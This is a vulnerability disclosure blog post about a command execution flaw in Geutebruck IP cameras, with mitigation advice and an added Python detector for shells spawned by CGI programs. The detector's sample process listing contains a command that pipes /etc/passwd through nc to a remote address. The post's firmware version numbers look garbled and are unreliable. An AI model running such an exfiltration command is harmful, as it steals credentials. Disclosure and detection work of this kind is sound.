Last summer, during a pentest for a client, we came across high-end IP cameras made by Geutebruck, a "leading German manufacturer and developer of high-quality, intelligent video security solutions" (source: http://www.sourcesecurity.com/companies/enhanced-company-listing/geutebruck-gmbh.html), and found a trivial remote command execution vulnerability (0day) affecting version 22.214.171.124 and prior versions. We chose to responsibly disclose it, directly to Geutebruck and to ICS-CERT (Industrial Control Systems Cyber Emergency Response Team). That was probably the best option, as the Mirai botnet was actively exploiting IP cameras at the time. Since then a new firmware (126.96.36.199) has been released to patch it, ICS-CERT has published an advisory, and a CVE (CVE-2017-5173) has been assigned.
Many thanks to the Geutebruck and ICS-CERT teams, and of course to Dan Goodin (who helped with the communication with Geutebruck) and to Frédéric Cikala and Florent Montel for discovering CVE-2017-5174 (authentication bypass), which helped a lot ;)
The ICS-CERT advisory summarizes the impact: "Successful exploitation of these vulnerabilities could allow the attacker to bypass authentication and obtain remote anonymous access to the device; these vulnerabilities may allow remote code execution. (…)"
We wrote a Metasploit exploit for it:

`ps` output after the camera was owned: the abused CGI is visible at PID 3055, and the abused system call with the Metasploit payload at PID 3056:
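The parent/child relationship visible in that `ps` listing (a web server, its CGI handler, then a shell spawned by the CGI) is also what a defender can look for on a device suspected of being compromised. The following is an added example, not code from the original post or from Geutebruck: it parses a `ps`-style listing and flags every shell whose parent is a CGI program running under a web server. The listing it runs on is constructed for the example; the process names, paths, PIDs and the remote address in it are hypothetical, not captured from a real camera.

```python
"""Flag CGI-spawned shells in a ps listing (added example, constructed data)."""
import re

# Constructed `ps -o pid,ppid,args` style listing; not captured from a real
# device. Names, paths, PIDs and the address are hypothetical placeholders.
SAMPLE_PS = """\
  PID  PPID COMMAND
    1     0 init
  812     1 /usr/sbin/httpd -f /etc/httpd.conf
 3055   812 /www/cgi-bin/example.cgi
 3056  3055 sh -c cat /etc/passwd | nc 203.0.113.10 4444
 3057  3056 nc 203.0.113.10 4444
 3060     1 /usr/bin/watchdog
"""

# Embedded web servers and shells commonly seen on camera firmware
# (an assumed, non-exhaustive list; extend it for the device at hand).
WEB_SERVERS = {"httpd", "lighttpd", "boa", "thttpd", "mini_httpd", "nginx"}
SHELLS = {"sh", "bash", "ash", "dash"}


def parse_ps(text):
    """Return {pid: (ppid, argv)} from a listing whose first line is a header."""
    procs = {}
    for line in text.splitlines()[1:]:
        m = re.match(r"\s*(\d+)\s+(\d+)\s+(.*)$", line)
        if m:
            procs[int(m.group(1))] = (int(m.group(2)), m.group(3).split())
    return procs


def basename(argv):
    """Program name without its directory, or '' for an empty argv."""
    return argv[0].rsplit("/", 1)[-1] if argv else ""


def is_shell(argv):
    """True for a plain shell or for `busybox sh`-style invocations."""
    name = basename(argv)
    return name in SHELLS or (name == "busybox" and len(argv) > 1 and argv[1] in SHELLS)


def is_cgi(argv):
    """Heuristic: the binary ends in .cgi or lives under a cgi-bin directory."""
    return basename(argv).endswith(".cgi") or "/cgi-bin/" in (argv[0] if argv else "")


def ancestors(procs, pid):
    """Yield ancestor PIDs of pid, walking ppid links up to init."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        pid = procs[pid][0]
        yield pid


def find_cgi_shells(procs):
    """Return [(shell_pid, cgi_pid, server_pid)] for every shell whose parent
    is a CGI program that itself descends from a known web server."""
    hits = []
    for pid, (ppid, argv) in sorted(procs.items()):
        if not is_shell(argv) or ppid not in procs:
            continue
        if not is_cgi(procs[ppid][1]):
            continue
        server = next((a for a in ancestors(procs, ppid)
                       if a in procs and basename(procs[a][1]) in WEB_SERVERS), None)
        if server is not None:
            hits.append((pid, ppid, server))
    return hits


if __name__ == "__main__":
    for shell_pid, cgi_pid, server_pid in find_cgi_shells(parse_ps(SAMPLE_PS)):
        print(f"shell {shell_pid} spawned by CGI {cgi_pid} under web server {server_pid}")
```

On a live device the same function can be fed the output of `ps -o pid,ppid,args` (or BusyBox `ps` with the equivalent columns); a CGI handler that never legitimately spawns a shell should never produce a hit, so every match is worth a closer look at the shell's command line.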
Geutebruck has released a new software version, Version 188.8.131.52, to address the identified vulnerability. It is available at the following location (registration required): http://www.geutebrueck.com/en_EN/login.html

If updating is not possible right away, users can disable the "Enable anonymous access" option in the meantime to reduce the risk. The RCE remains, but it is then reachable only by authenticated users. Note that the separate authentication bypass mentioned above (CVE-2017-5174) can give an unauthenticated attacker that same access, so this only reduces exposure and does not replace the firmware update.
In the wild
Many brands ship the same firmware (and are therefore vulnerable too):
- UDP Technology (which is also the supplier of the firmware for the other vendors)
- THRIVE Intelligence